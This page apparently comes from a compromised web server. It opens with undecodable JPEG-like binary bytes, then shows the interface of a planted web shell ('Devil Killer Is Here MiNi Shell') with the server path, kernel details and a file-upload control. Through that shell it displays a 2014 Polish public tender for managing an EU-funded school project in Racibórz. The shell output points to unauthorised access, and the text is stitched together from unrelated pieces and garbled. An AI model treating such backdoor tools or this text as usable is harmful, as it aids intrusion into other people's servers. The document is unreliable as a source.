JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140214/53090-N-2014.html

<p class="kh_header"><b>Racibórz: Usługa kompleksowego zarządzania i rozliczania finansowego Projektu systemowego pod nazwą: Lepsza edukacja - lepsza przyszłość - realizowanego w  ramach  Programu Operacyjnego kapitał Ludzki, w tym:
  Część 1 - Kierowanie Projektem
  Część 2 - Koordynacja Projektem w SOSWNiS w Raciborzu
  Część 3 - Koordynacja Projektem w ZSOMS w Raciborzu
  Część 4 - Koordynacja Projektem w MOW w Krupskim Młynie
  Część 5 - Nadzór finansowy i rozliczanie budżetu Projektu</b><br>
<b>Numer ogłoszenia: 53090 - 2014; data zamieszczenia: 14.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy dla Niesłyszących i Słabosłyszących , ul. Karola Miarki 4, 47-400 Racibórz, woj. śląskie, tel. 032 4147334, 4152255, 4153001, faks 032 4147334, 4152255 w. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.oswnis.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka podległa administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowego zarządzania i rozliczania finansowego Projektu systemowego pod nazwą: Lepsza edukacja - lepsza przyszłość - realizowanego w  ramach  Programu Operacyjnego kapitał Ludzki, w tym:
  Część 1 - Kierowanie Projektem
  Część 2 - Koordynacja Projektem w SOSWNiS w Raciborzu
  Część 3 - Koordynacja Projektem w ZSOMS w Raciborzu
  Część 4 - Koordynacja Projektem w MOW w Krupskim Młynie
  Część 5 - Nadzór finansowy i rozliczanie budżetu Projektu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Usługa polegająca na kompleksowym zarządzaniu, koordynacji, nadzorze i rozliczeniu budżetu Projektu, realizowanego w ramach Programu Operacyjnego kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
2.	Przedmiot zamówienia został podzielony na części 1 - 5, w tym:
Część 1 - Kierowanie Projektem;
Część 2 - Koordynacja Projektem w SOSWNiS w Raciborzu; 
Część 3 - Koordynacja Projektem w ZSOMS w Raciborzu; 
Część 4 - Koordynacja Projektem w MOW w Krupskim Młynie; 
Część 5 - Nadzór finansowy i rozliczanie budżetu Projektu.
3.	Specjalny Ośrodek Szkolno - Wychowawczy dla Niesłyszących i Słabosłyszących w Raciborzu przy ul. Karola Miarki 4 (w skrócie SOSWNiS), który jest Liderem Projektu pod nazwą Lepsza edukacja - lepsza przyszłość realizuje Projekt w trybie systemowym z Partnerami Projektu tj. z Zespołem Szkół Ogólnokształcących Mistrzostwa Sportowego w Raciborzu przy ul. Kozielskiej 19 (w skrócie ZSOMS), oraz z Młodzieżowym Ośrodkiem Wychowawczym w Krupskim Młynie (powiat Tarnogórski)  przy ul. Krasickiego 4 (w skrócie MOW). 
4.	Wykonawca w ramach usługi stanowiącej przedmiot zamówienia zobowiązany będzie do: 
1)	w zakresie części 1: kompleksowego kierowania i zarządzania całością projektu;
2)	w zakresie części 2: koordynowania działań projektowych w SOSWNiS w Raciborzu  - w zakresie przewidzianym do realizacji przez Lidera Projektu oraz Partnerów;
3)	w zakresie części 3: koordynowania działań projektowych w ZSOMS w Raciborzu  - w zakresie przewidzianym do realizacji przez Lidera Projektu oraz Partnerów;
4)	w zakresie części 4: koordynowania działań projektowych w MOW w Krupskim Młynie- w zakresie przewidzianym do realizacji przez Lidera Projektu oraz Partnerów;
5)	w zakresie części 5: sprawowania nadzoru finansowego i rozliczania budżetu projektu, prowadzenia rachunkowości, przy ścisłej współpracy z komórkami finansowymi Lidera i Partnerów Projektu.
5.	Usługa zarządzania i nadzoru nad projektem realizowana będzie bezpośrednio przez osoby spełniające wymagania określone w SIWZ, wskazane przez Wykonawcę do pełnienia funkcji: 
1)	w zakresie części 1:  Kierownika Projektu - 1 osoba - zarządzająca i nadzorująca całość projektu oraz koordynująca działania kadry zatrudnionej przy jego realizacji, w tym odpowiedzialna za sferę finansową projektu;  
przewidywana liczba godzin na realizację zadania: 93 godz. w mies. x 16 mies. tj. 1488 godz. 
2)	w zakresie części 2:  Koordynatora Projektu - 1 osoba - nadzorująca realizację działań w ramach projektu w SOSWNiS w Raciborzu; 
przewidywana liczba godzin na realizację zadania:  53 godz. w mies. x 16 mies. tj.  848 godz. 
3)	w zakresie części 3:  Koordynatora Projektu - 1 osoba - nadzorująca realizację działań w ramach projektu w ZSOMS w Raciborzu; 
przewidywana liczba godzin na realizację zadania:  53 godz. w mies. x 16 mies.  tj.  848 godz.
4)	w zakresie części 4:  Koordynatora Projektu - 1 osoba - nadzorująca realizację działań w ramach projektu tj. w  MOW w Krupskim Młynie;  
przewidywana liczba godzin na realizację zadania:  53 godz. w mies. x 16 mies.  tj.  848 godz.  
5)	w zakresie części 5: Specjalisty ds. finansowych - 1 osoba - prowadząca pełną dokumentację finansowo - księgową projektu; 
przewidywana liczba godzin na realizację zadania:  56 godz. w mies. x 16 mies.  tj. 896 godz. 
6.	Główne cele i założenia realizowanego Projektu oraz szczegółowy zakres usług, jak również wymagania osobowe oraz obowiązki Kierownika Projektu, Koordynatorów i Specjalisty ds. finansowych określone zostały w załączniku nr 1 do SIWZ - Szczegółowy opis przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2, 79.21.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca wykazał, że dysponuje lub będzie dysponował osobami:

       W odniesieniu do części 1: Kierownik Projektu - 1 osoba posiadająca: 
a)	wykształcenie wyższe magisterskie o profilu: ekonomicznym / zarządzanie / bankowość / finanse;
b)	minimum 5 letni staż pracy na stanowisku kierowniczym związanym z zarządzaniem oświatą, tj. w jednostce organizacyjnej lub w komórce organu prowadzącego nadzorującej szkoły, lub w jednostce oświatowej - w szkole / szkole wyższej;
a)	udokumentowane doświadczenie w zarządzaniu i rozliczaniu min. 2 projektów finansowanych z funduszy europejskich.

       W odniesieniu do części 2:  Koordynator Projektu w SOSWNiS w Raciborzu - 1 osoba posiadająca:
a)	wykształcenie wyższe pedagogiczne lub spełnienie kryteriów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b)	stopień nauczyciela dyplomowanego, zgodnie z Ustawą Karta Nauczyciela;
c)	kursy kwalifikacyjne lub studia: surdopedagogika - przygotowujące do pracy z osobami z wadami słuchu;
d)	kurs kwalifikacyjny lub studia: zarządzanie oświatą (dopuszcza się kandydata w trakcie zdobywania uprawnień);
e)	minimum 5 letnie doświadczenie w prowadzeniu zajęć z uczniami niepełnosprawnymi -  z wadami słuchu (niesłyszącymi, słabosłyszącymi);
f)	udokumentowane doświadczenie w zarządzaniu, przygotowaniu lub udział w min. 1 projekcie  finansowanym ze środków unijnych.
 
       W odniesieniu do części 3:  Koordynator Projektu w ZSOMS w Raciborzu - 1 osoba posiadająca:
a)	wykształcenie wyższe pedagogiczne lub spełnienie kryteriów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b)	stopień nauczyciela dyplomowanego, zgodnie z Ustawą Karta Nauczyciela,  
c)	kompetencje metodyka - specjalisty, lub jest ekspertem wpisanym na listę ekspertów MEN;
d)	kurs kwalifikacyjny lub studia: zarządzanie oświatą (dopuszcza się kandydata w trakcie zdobywania uprawnień);
e)	minimum 5 letni staż pracy w szkole;
f)	udokumentowane doświadczenie w zarządzaniu, przygotowaniu lub udział w min. 1 projekcie  finansowanym ze środków unijnych.

       W odniesieniu do części 4:  Koordynator Projektu w MOW w Krupskim Młynie - 1 osoba posiadająca:
a)	wykształcenie wyższe pedagogiczne lub spełnienie kryteriów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b)	stopień nauczyciela dyplomowanego, zgodnie z Ustawą Karta Nauczyciela;
c)	kurs kwalifikacyjny lub studia o kierunku resocjalizacja;
d)	kurs kwalifikacyjny lub studia: zarządzanie oświatą (dopuszcza się kandydata w trakcie zdobywania uprawnień);
e)	minimum 5-letnie doświadczenie w prowadzeniu zajęć z uczniami niedostosowanymi społecznie;
f)	udokumentowane doświadczenie w zarządzaniu, przygotowaniu lub udział w min. 1 projekcie  finansowanym ze środków unijnych.

    W odniesieniu do części 5:  Specjalista ds. finansowych - 1 osoba spełniająca jeden z poniższych warunków:
a)	ukończyła ekonomiczne jednolite studia magisterskie, ekonomiczne wyższe studia zawodowe, uzupełniające ekonomiczne studia magisterskie lub ekonomiczne studia podyplomowe,  posiada co najmniej 4-letnią praktykę w księgowości sektora finansów publicznych, oraz doświadczenie w rozliczaniu min. 2 projektów finansowanych z funduszy europejskich;
b)	ukończyła szkołę policealną, pomaturalną lub średnią i posiada co najmniej 6-letnią praktykę w księgowości sektora finansów publicznych oraz doświadczenie w rozliczaniu min. 2 projektów finansowanych z funduszy europejskich;
c)	jest wpisana do rejestru biegłych rewidentów na podstawie odrębnych przepisów, oraz posiada doświadczenie w rozliczaniu min. 2 projektów finansowanych z funduszy europejskich;
d)	posiada certyfikat księgowy uprawniający do usługowego prowadzenia ksiąg rachunkowych albo świadectwo kwalifikacyjne uprawniające do usługowego prowadzenia ksiąg rachunkowych, wydane na podstawie odrębnych przepisów, oraz doświadczenie w rozliczaniu min. 2 projektów finansowanych z funduszy europejskich.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio wartości zamówienia, sposobu lub terminu realizacji zamówienia w przypadku zaistnienia następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody znacznych rozmiarach;
2)	z  powodu działań osób trzecich uniemożliwiających wykonanie umowy, które to działania nie są konsekwencją winy którejkolwiek ze stron;
3)	w razie ustawowych zmian stawki podatku od towarów i usług VAT;
4)	w przypadku zmian,  których na dzień podpisania Umowy Zamawiający nie był w stanie przewidzieć:
a)	zmiany zakresu godzin pracy osób wskazanych do pełnienia funkcji;
b)	przerwanie projektu z przyczyn niezależnych od obu stron;
c)	zmian dotyczących aktualnych potrzeb uczestników projektu, gdy konieczność  wprowadzenia tych zmian będzie następstwem zmian wytycznych i zaleceń dotyczących Projektu;
d)	powodu innych zmian w sposobie realizacji zamówienia, gdy konieczność tych zmian wynikać będzie z zaleceń instytucji nadzorujących lub kontrolujących realizację Projektu;
e)	 zmian organizacyjnych polegających na zmianie osób lub innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie będą gorsze od tych, jakie posiadają podmioty zmieniane.
2.	Zmiana warunków umowy nastąpi na podstawie podpisanego przez Strony aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.oswnis.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno - Wychowawczy dla Niesłyszących i Słabosłyszących ul. Karola Miarki 4, 47-400 Racibórz, budynek główny - pok. nr 1.18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2014 godzina 10:00, miejsce: Specjalny Ośrodek Szkolno - Wychowawczy dla Niesłyszących i Słabosłyszących ul. Karola Miarki 4, 47-400 Racibórz, budynek główny - Biuro podawcze, pok 1.1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pod nazwą: Lepsza edukacja - lepsza przyszłość - realizowany w  ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kierowanie Projektem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa kompleksowe kierowania i zarządzania całością projektu. Przewidywana liczba godzin na realizację zadania: 93 godz. w mies. x 16 mies. tj. 1488 godz.
Kierownik Projektu:  Pełna odpowiedzialność za Projekt;
Organizacja pracy Biura Projektu;
Prowadzenie nadzoru nad prawidłową realizacją merytorycznych działań projektu zgodnie z wymogami POKL oraz obowiązującymi przepisami krajowymi, w oparciu o umowę o dofinansowanie wraz z załącznikami;
Zarządzanie i nadzór działania całej kadry projektu; 
Prowadzenie spraw organizacyjno-merytorycznych; 
Organizacja raz w miesiącu spotkania kadry zarządzającej projektem;
Przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu;
Przygotowanie części sprawozdawczej i finansowej wniosków o płatność zaliczkową i końcową;
Akceptowanie strategicznych decyzji finansowych, w szczególności decyzji związanych z wykorzystaniem przyznanych środków, uruchamianiem i występowaniem o poszczególne transze;
Planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu;
Sporządzanie i przedkładanie Zamawiającemu do czasu końcowego rozliczenia projektu comiesięcznego sprawozdania z postępów w realizacji projektu.
Współpraca z organami prowadzącymi oraz dyrektorami placówek biorących udział w Projekcie; 
Nadzorowanie przetwarzanie danych osobowych w projekcie, zgodnie z obowiązującymi przepisami;
Nadzór nad terminowością i prawidłowością prowadzenia, przechowywania i archiwizowania dokumentacji Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynacja Projektem w Specjalnym Ośrodku Szkolno - Wychowawczym dla Niesłyszących i Słabosłyszących w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa koordynowania działań projektowych w SOSWNiS w Raciborzu  - w zakresie przewidzianym do realizacji przez Lidera Projektu oraz Partnerów. Przewidywana liczba godzin na realizację zadania:  53 godz.w mies. x 16 mies. tj.  848 godz.
Koordynator Projektu w SOSWNiS:
Koordynuje działania w ramach Projektu w Specjalnym Ośrodku Szkolno - Wychowawczym dla Niesłyszących i Słabosłyszących w Raciborzu przy ul. Karola Miarki 4;
Podlega Kierownikowi projektu;
Bierze udział w procesie rekrutacji i pracach komisji rekrutacyjnej; 
Opracowuje formularze rekrutacyjne;
Prowadzi sprawy administracyjno - biurowe związane z obsługą Projektu w SOSWNiS;
Sprawuje nadzór pedagogiczny nad kadrą pedagogiczną zatrudnioną w placówce w ramach Projektu;
Monitoruje realizację wytyczonych celów projektu raz na kwartał;
Podejmuje niezbędne działania mające na celu osiągnięcie wskaźników rezultatu projektu;
Aktualizuje dokumenty w związku ze zmianami w projekcie;
